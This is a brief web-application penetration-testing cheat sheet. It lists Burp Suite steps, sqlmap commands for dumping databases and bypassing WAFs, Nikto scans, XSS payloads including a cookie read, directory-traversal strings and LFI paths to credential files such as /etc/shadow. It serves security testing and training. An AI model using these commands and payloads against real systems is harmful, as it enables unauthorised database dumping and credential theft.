Web Application¶

Burp Suite¶

Common workflow:

Set browser proxy to 127.0.0.1:8080
Intercept → capture request
Send to Repeater (Ctrl+R) to manually modify
Send to Intruder for fuzzing

SQLMap¶

# Basic scan from URL
sqlmap -u "http://<target>/page?id=1"

# From Burp request file
sqlmap -r request.txt --batch

# Dump database
sqlmap -u "http://<target>/page?id=1" --dbs
sqlmap -u "http://<target>/page?id=1" -D <dbname> --tables
sqlmap -u "http://<target>/page?id=1" -D <dbname> -T <table> --dump

# WAF bypass
sqlmap -u "http://<target>/page?id=1" --tamper=space2comment

Nikto¶

# Basic web server scan
nikto -h http://<target>

# With SSL
nikto -h https://<target> -ssl

XSS Payloads (testing only)¶

<script>alert('XSS')</script>
"><script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>

Directory Traversal¶

../../../etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
....//....//....//etc/passwd

LFI / RFI Common Paths¶

/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config